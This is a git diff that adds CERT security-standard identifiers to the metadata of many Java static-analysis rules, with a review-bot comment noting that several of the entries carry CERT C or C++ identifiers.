diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1065_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1065_java.json
index 5cd731e39c2..05eb7e95ace 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1065_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1065_java.json
@@ -13,5 +13,10 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-1065",
"sqKey": "S1065",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "MSC12-C."
+ ]
+ }
}
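Review bot: The added `CERT` entry here is `"MSC12-C."`, a CERT C identifier, attached to a Java rule; the same pattern recurs in the hunks for S1116 (`MSC12-C.`, `EXP15-C.`), S1117 (`DCL01-C.`), S1121 (`EXP45-C.`, `EXP19-CPP.`), S121, S126, S128, S131, S1314, S1659, S1699 (`OOP50-CPP.`), S1854, S1168, S1172, S1656, S1764, S1862, S2095, S2184, and S2164 and S2178 receive a C-only identifier with no `-J.` counterpart at all. Whether the consumer of `securityStandards` expects only Java CERT identifiers is not visible in this diff, so this needs confirming: if it filters on the `-J.` suffix these entries are silently dropped, and if it does not, Java projects will report compliance against CERT C/C++ rules. If these files are generated from the RSPEC source, the correction belongs upstream, and a short note in the commit description saying which CERT standard editions are intentionally included would spare reviewers the same question on each hunk.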
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S106_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S106_java.json
index 2e39436a5e1..0c7c3c591ba 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S106_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S106_java.json
@@ -18,6 +18,9 @@
"securityStandards": {
"OWASP": [
"A3"
+ ],
+ "CERT": [
+ "ERR02-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1075_java.html b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1075_java.html
index 39925b53eb1..91c58f63eed 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1075_java.html
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1075_java.html
@@ -8,7 +8,7 @@
Noncompliant Code Example
public class Foo {
public Collection<User> listUsers() {
- File userList = new File("/home/mylogin/Dev/users.txt"); // Non-Compliant
+ File userList = new File("/home/mylogin/Dev/users.txt"); // Noncompliant
Collection<User> users = parse(userList);
return users;
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1075_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1075_java.json
index 6fe3c8dd452..5248c0cb905 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1075_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1075_java.json
@@ -13,5 +13,10 @@
"defaultSeverity": "Minor",
"ruleSpecification": "RSPEC-1075",
"sqKey": "S1075",
- "scope": "Main"
+ "scope": "Main",
+ "securityStandards": {
+ "CERT": [
+ "MSC03-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1111_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1111_java.json
index d0eeee5e65d..db153e53e7f 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1111_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1111_java.json
@@ -17,6 +17,9 @@
"securityStandards": {
"CWE": [
586
+ ],
+ "CERT": [
+ "MET12-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1113_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1113_java.json
index b97a3396ac8..78e033e8889 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1113_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1113_java.json
@@ -13,5 +13,10 @@
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-1113",
"sqKey": "ObjectFinalizeOverridenCheck",
- "scope": "Main"
+ "scope": "Main",
+ "securityStandards": {
+ "CERT": [
+ "MET12-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1114_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1114_java.json
index 4442af5526c..57084b05a46 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1114_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1114_java.json
@@ -17,6 +17,9 @@
"securityStandards": {
"CWE": [
568
+ ],
+ "CERT": [
+ "MET12-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1116_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1116_java.json
index fbc2f706c06..35c4b642041 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1116_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1116_java.json
@@ -13,5 +13,12 @@
"defaultSeverity": "Minor",
"ruleSpecification": "RSPEC-1116",
"sqKey": "S1116",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "MSC12-C.",
+ "MSC51-J.",
+ "EXP15-C."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1117_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1117_java.json
index 4de7683f6ad..2e248b1ea4d 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1117_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1117_java.json
@@ -14,5 +14,11 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-1117",
"sqKey": "S1117",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "DCL51-J.",
+ "DCL01-C."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1121_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1121_java.json
index b6980fd9369..fc5809607de 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1121_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1121_java.json
@@ -18,6 +18,11 @@
"securityStandards": {
"CWE": [
481
+ ],
+ "CERT": [
+ "EXP45-C.",
+ "EXP51-J.",
+ "EXP19-CPP."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S112_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S112_java.json
index addec823853..b02c9f59710 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S112_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S112_java.json
@@ -18,6 +18,9 @@
"securityStandards": {
"CWE": [
397
+ ],
+ "CERT": [
+ "ERR07-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1143_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1143_java.json
index d76da59c60c..178dbb93de0 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1143_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1143_java.json
@@ -18,6 +18,9 @@
"securityStandards": {
"CWE": [
584
+ ],
+ "CERT": [
+ "ERR04-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1147_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1147_java.json
index 14f1dd1fafc..6adbcf98ad7 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1147_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1147_java.json
@@ -18,6 +18,9 @@
"securityStandards": {
"CWE": [
382
+ ],
+ "CERT": [
+ "ERR09-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1163_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1163_java.json
index 3f595107222..bffc2ba68de 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1163_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1163_java.json
@@ -14,5 +14,10 @@
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-1163",
"sqKey": "S1163",
- "scope": "Main"
+ "scope": "Main",
+ "securityStandards": {
+ "CERT": [
+ "ERR05-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1166_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1166_java.json
index d45e9af3ec4..39c93465f50 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1166_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1166_java.json
@@ -23,6 +23,9 @@
],
"OWASP": [
"A10"
+ ],
+ "CERT": [
+ "ERR00-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1168_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1168_java.json
index c2353d8661f..6c6f3c74793 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1168_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1168_java.json
@@ -12,5 +12,11 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-1168",
"sqKey": "S1168",
- "scope": "Main"
+ "scope": "Main",
+ "securityStandards": {
+ "CERT": [
+ "MSC19-C.",
+ "MET55-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1172_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1172_java.json
index 866ffcac2de..a1ab3848433 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1172_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1172_java.json
@@ -13,5 +13,10 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-1172",
"sqKey": "S1172",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "MSC12-C."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1174_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1174_java.json
index 7927343213d..0214f535160 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1174_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1174_java.json
@@ -17,6 +17,9 @@
"securityStandards": {
"CWE": [
583
+ ],
+ "CERT": [
+ "MET12-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1176_java.html b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1176_java.html
index 9dc37a97574..4bb11828691 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1176_java.html
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1176_java.html
@@ -13,7 +13,7 @@
All parameters documented with @param
, and names should match.
All checked exceptions documented with @throws
@return
present and documented when not void
.
- Placeholders like "TODO", "FIXME", "..." should be avoided.
+ Placeholders like "TODO"
, "FIXME"
, "..."
should be avoided.
The following public methods and constructors are not taken into account by this rule:
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1181_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1181_java.json
index ccc35882ebd..c600fae2e7b 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1181_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1181_java.json
@@ -20,6 +20,9 @@
"securityStandards": {
"CWE": [
396
+ ],
+ "CERT": [
+ "ERR08-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1182_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1182_java.json
index aa3e43a9187..3ce3a4307af 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1182_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1182_java.json
@@ -18,6 +18,9 @@
"securityStandards": {
"CWE": [
580
+ ],
+ "CERT": [
+ "MET53-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1193_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1193_java.json
index 3de658710a4..4d779ff745e 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1193_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1193_java.json
@@ -14,5 +14,10 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-1193",
"sqKey": "S1193",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "ERR51-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1206_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1206_java.json
index 857437accb8..49f8859dbbb 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1206_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1206_java.json
@@ -17,6 +17,9 @@
"securityStandards": {
"CWE": [
581
+ ],
+ "CERT": [
+ "MET09-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1217_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1217_java.json
index aca07a20ab6..13c27c9e5c8 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1217_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1217_java.json
@@ -18,6 +18,9 @@
"securityStandards": {
"CWE": [
572
+ ],
+ "CERT": [
+ "THI00-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S121_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S121_java.json
index f8fe09dc3f8..55978f81615 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S121_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S121_java.json
@@ -13,5 +13,11 @@
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-121",
"sqKey": "S121",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "EXP19-C.",
+ "EXP52-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S126_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S126_java.json
index 60de6eb10c0..82079367df9 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S126_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S126_java.json
@@ -12,5 +12,11 @@
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-126",
"sqKey": "S126",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "MSC01-C.",
+ "MSC57-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S128_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S128_java.json
index 835827bf766..56f8954bfab 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S128_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S128_java.json
@@ -18,6 +18,10 @@
"securityStandards": {
"CWE": [
484
+ ],
+ "CERT": [
+ "MSC17-C.",
+ "MSC52-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1313_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1313_java.json
index 0858955d737..c0d558d9239 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1313_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1313_java.json
@@ -17,6 +17,9 @@
"securityStandards": {
"OWASP": [
"A3"
+ ],
+ "CERT": [
+ "MSC03-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1314_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1314_java.json
index ab520af8079..2b8fc19bfbd 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1314_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1314_java.json
@@ -13,5 +13,11 @@
"defaultSeverity": "Blocker",
"ruleSpecification": "RSPEC-1314",
"sqKey": "S1314",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "DCL18-C.",
+ "DCL50-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S131_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S131_java.json
index d9ca9efd5cc..6a78c5f3030 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S131_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S131_java.json
@@ -17,6 +17,9 @@
"securityStandards": {
"CWE": [
478
+ ],
+ "CERT": [
+ "MSC01-C."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1444_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1444_java.json
index 96c2e91e3c0..b5c4d36902a 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1444_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1444_java.json
@@ -17,6 +17,9 @@
"securityStandards": {
"CWE": [
500
+ ],
+ "CERT": [
+ "OBJ10-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1449_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1449_java.json
index b6b6852afa5..862a912827c 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1449_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1449_java.json
@@ -13,5 +13,10 @@
"defaultSeverity": "Minor",
"ruleSpecification": "RSPEC-1449",
"sqKey": "S1449",
- "scope": "Main"
+ "scope": "Main",
+ "securityStandards": {
+ "CERT": [
+ "STR02-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1656_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1656_java.json
index 93e47bc5c36..858192c2fc9 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1656_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1656_java.json
@@ -12,5 +12,10 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-1656",
"sqKey": "S1656",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "MSC12-C."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1659_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1659_java.json
index 24d3639ce43..318c1960698 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1659_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1659_java.json
@@ -13,5 +13,11 @@
"defaultSeverity": "Minor",
"ruleSpecification": "RSPEC-1659",
"sqKey": "S1659",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "DCL52-J.",
+ "DCL04-C."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1696_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1696_java.json
index 4166a3a35d4..fde613ae0bd 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1696_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1696_java.json
@@ -18,6 +18,9 @@
"securityStandards": {
"CWE": [
395
+ ],
+ "CERT": [
+ "ERR08-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1698_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1698_java.json
index da0c9eaeb97..904a1f1881c 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1698_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1698_java.json
@@ -19,6 +19,10 @@
"CWE": [
595,
597
+ ],
+ "CERT": [
+ "EXP03-J.",
+ "EXP50-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1699_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1699_java.json
index 25c919fa429..5bd1d74dfcc 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1699_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1699_java.json
@@ -13,5 +13,11 @@
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-1699",
"sqKey": "S1699",
- "scope": "Main"
+ "scope": "Main",
+ "securityStandards": {
+ "CERT": [
+ "MET05-J.",
+ "OOP50-CPP."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1764_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1764_java.json
index 411e7157207..3bd31292d48 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1764_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1764_java.json
@@ -12,5 +12,10 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-1764",
"sqKey": "S1764",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "MSC12-C."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1854_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1854_java.json
index 77b528f47e6..89215444a0d 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1854_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1854_java.json
@@ -18,6 +18,10 @@
"securityStandards": {
"CWE": [
563
+ ],
+ "CERT": [
+ "MSC13-C.",
+ "MSC56-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1860_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1860_java.json
index 42f64264e3e..92ce3266513 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1860_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1860_java.json
@@ -13,5 +13,10 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-1860",
"sqKey": "S1860",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "LCK01-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1862_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1862_java.json
index 7b9a092eb15..f1dc477cd7c 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1862_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1862_java.json
@@ -14,5 +14,10 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-1862",
"sqKey": "S1862",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "MSC12-C."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1872_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1872_java.json
index 944e0ee99b0..c6be7055168 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1872_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1872_java.json
@@ -17,6 +17,9 @@
"securityStandards": {
"CWE": [
486
+ ],
+ "CERT": [
+ "OBJ09-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1874_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1874_java.json
index b38bb6dc067..3648adfae1d 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1874_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1874_java.json
@@ -18,6 +18,9 @@
"securityStandards": {
"CWE": [
477
+ ],
+ "CERT": [
+ "MET02-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1943_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1943_java.json
index 1d07699b490..5344ff903f6 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1943_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1943_java.json
@@ -14,5 +14,11 @@
"defaultSeverity": "Minor",
"ruleSpecification": "RSPEC-1943",
"sqKey": "S1943",
- "scope": "Main"
+ "scope": "Main",
+ "securityStandards": {
+ "CERT": [
+ "STR04-J.",
+ "STR50-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1989_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1989_java.json
index a6569caccf3..0b784d66351 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1989_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1989_java.json
@@ -22,6 +22,9 @@
],
"OWASP": [
"A3"
+ ],
+ "CERT": [
+ "ERR01-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2057_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2057_java.json
index 63abae0c543..a2c36021cda 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2057_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2057_java.json
@@ -14,5 +14,10 @@
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-2057",
"sqKey": "S2057",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "SER00-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2059_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2059_java.json
index 72e389116ca..3f83424d4c9 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2059_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2059_java.json
@@ -14,5 +14,10 @@
"defaultSeverity": "Minor",
"ruleSpecification": "RSPEC-2059",
"sqKey": "S2059",
- "scope": "Main"
+ "scope": "Main",
+ "securityStandards": {
+ "CERT": [
+ "SER05-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2061_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2061_java.json
index e7fee8eefdd..e44e377bfef 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2061_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2061_java.json
@@ -12,5 +12,10 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-2061",
"sqKey": "S2061",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "SER01-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2066_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2066_java.json
index 5244aba913e..1206915f6d2 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2066_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2066_java.json
@@ -13,5 +13,10 @@
"defaultSeverity": "Minor",
"ruleSpecification": "RSPEC-2066",
"sqKey": "S2066",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "SER05-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2068_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2068_java.json
index f76ac47d770..068ad25e92e 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2068_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2068_java.json
@@ -23,6 +23,9 @@
],
"OWASP": [
"A2"
+ ],
+ "CERT": [
+ "MSC03-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2077_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2077_java.json
index 93a1604b165..d61ac95d186 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2077_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2077_java.json
@@ -29,6 +29,9 @@
],
"OWASP": [
"A1"
+ ],
+ "CERT": [
+ "IDS00-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2093_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2093_java.json
index 8c9a9111175..8e6b279d9e8 100644
